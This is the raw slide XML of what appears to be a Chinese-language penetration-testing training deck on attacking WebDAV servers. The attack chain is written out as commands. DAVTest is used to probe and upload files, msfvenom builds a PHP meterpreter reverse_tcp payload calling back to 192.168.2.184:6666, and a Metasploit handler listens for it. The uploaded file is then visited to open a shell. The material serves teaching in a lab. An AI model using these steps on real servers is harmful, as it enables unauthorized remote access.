              </a:lnSpc>
              <a:buChar char="•"/>
            </a:pP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dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35843" name="矩形 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1947863" y="2005013"/>
            <a:ext cx="9144000" cy="1129665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="900"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sz="900"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sz="900"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sz="900" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="900" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1154430" y="1673225"/>
            <a:ext cx="1001839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DAVTest说明：</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DAVTest 上传测试的可执行文件，然后（可选）上传文件，允许用于执行命令，或者直接在目标上其他操作测试启用的WebDAV服务器。它的目的是渗透测试快速，轻松地确定是否启用DAV服务攻击。</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DAVTest支持：</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自动发送文件漏洞</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目录自动随机帮助隐藏文件</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发送文本文件，并尝试MOVE到可执行文件的名称</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上传的文件自动清理</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发送任意文件</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:overrideClrMapping bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>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davtest</a:t>
            </a:r>
            <a:r>
              <a:t>用法</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="25" name="图片 14"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="423545" y="1544955"/>
            <a:ext cx="6433185" cy="3642995"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1228090" y="5687060"/>
            <a:ext cx="5842000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>davtest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> http://192.168.2.222</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>/dav</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7070090" y="2861945"/>
            <a:ext cx="4797425" cy="213487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davtest</a:t>
            </a:r>
            <a:r>
              <a:t>执行结果</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="26" name="图片 15"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2075815" y="1621790"/>
            <a:ext cx="8032750" cy="4495800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>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制作木马，本地监听</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2025">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>#msfnevom -p php/meterpreter/reverse_tcp -lhost 192.168.2.184 -lport 6666 -f raw -o test.php</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2025">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>msf&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2025">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>use exploit/multi/handler</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2025">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2025">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>msf exploit(handler) &gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2025">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>set payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2025">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> php/meterpreter/reverse_tcp</a:t>
            </a:r>
            <a:endParaRPr sz="2025">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2025">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>设置下地址和端口，我们就开始监听了</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2025"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2025">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>msf exploit(handler) &gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2025">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>set lhost </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2025">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>192.168.2.184</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2025">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>msf exploit(handler) &gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2025">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>set lport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2025">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> 6666</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2025">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>msf exploit(handler) &gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2025">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>exploit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2025">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2025"/>
          </a:p>
          <a:p>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上传木马</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>#davtest -url http://192.168.2.222/dav/ -uploadfile </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>test.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t> -uploadloc </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DavTestDir_zCz505eDu1lp1O</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>/mytest_newname.php</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="53" name="图片 17"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2259965" y="2510790"/>
            <a:ext cx="5273040" cy="3911600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>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执行木马，获得</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>shell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>访问</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>http://192.168.2.222/dav/</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>DavTestDir_zCz505eDu1lp1O</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>/mytest_newname.php</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:t>获得</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>shell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="62" name="图片 21"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3552190" y="2611120"/>
            <a:ext cx="4034790" cy="1625600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1012190" y="5128260"/>
            <a:ext cx="8018780" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Meterpreter命令详解，https://www.cnblogs.com/backlion/p/9484949.html</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269222" y="415865"/>
            <a:ext cx="7886700" cy="431800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>实施方案</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Oval 37"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1609789" y="3521958"/>
            <a:ext cx="1149172" cy="11491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200" dirty="0">
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Oval 38"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4065539" y="3563597"/>
            <a:ext cx="1149172" cy="11491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200" dirty="0">
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Oval 39"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6560896" y="3622353"/>
            <a:ext cx="1149172" cy="11491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200" dirty="0">
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Oval 40"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9132702" y="3573285"/>
            <a:ext cx="1149172" cy="11491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3200" dirty="0">
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="原创设计师QQ：598969553           _26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3370419" y="3829227"/>
            <a:ext cx="2556151" cy="534634"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="21467D"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>逆向</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="21467D"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="31" name="Picture 64"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noSelect="1" noRot="1" noChangeAspect="1" noMove="1" noResize="1" noChangeShapeType="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="screen"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5107616" y="27865564"/>
            <a:ext cx="1976768" cy="511028"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="原创设计师QQ：598969553           _26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5806307" y="3879234"/>
            <a:ext cx="2556151" cy="534634"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="21467D"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="21467D"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="原创设计师QQ：598969553           _26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8429212" y="3880347"/>
            <a:ext cx="2556151" cy="534634"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="21467D"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>补丁</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="21467D"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="原创设计师QQ：598969553           _26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="882206" y="3849953"/>
            <a:ext cx="2556151" cy="534634"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2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渗透嗅探</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95639" y="1170789"/>
            <a:ext cx="7381902" cy="515546"/>
            <a:chOff x="180042" y="928625"/>
            <a:chExt cx="7381902" cy="515546"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="37" name="组合 36"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="180042" y="928625"/>
              <a:ext cx="7381902" cy="515546"/>
              <a:chOff x="2235016" y="7042507"/>
              <a:chExt cx="7381902" cy="515546"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="39" name="平行四边形 38"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2259393" y="7042507"/>
                <a:ext cx="400542" cy="195422"/>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0" name="平行四边形 39"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2235016" y="7096388"/>
                <a:ext cx="7381902" cy="461665"/>
              </a:xfrm>
              <a:prstGeom prst="parallelogram">
                <a:avLst/>
              </a:prstGeom>
              <a:gradFill flip="none" rotWithShape="1">
                <a:gsLst>
                  <a:gs pos="69000">
                    <a:srgbClr val="1A5CC0">
                      <a:alpha val="51000"/>
                    </a:srgbClr>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="1A5CC0">
                      <a:alpha val="0"/>
                    </a:srgbClr>
                  </a:gs>
                  <a:gs pos="0">
                    <a:srgbClr val="1A5C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a:ea typeface="等线" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="38" name="矩形 37"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="333829" y="982505"/>
              <a:ext cx="4825360" cy="461665"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>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综合实践场景</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系列递进任务模式</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="26" name="直接连接符 25"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2150247" y="4751763"/>
            <a:ext cx="1" cy="470954"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="22225" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="21467D"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:round/>
            <a:headEnd type="diamond" w="med" len="med"/>
            <a:tailEnd type="diamond" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="文本框 26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
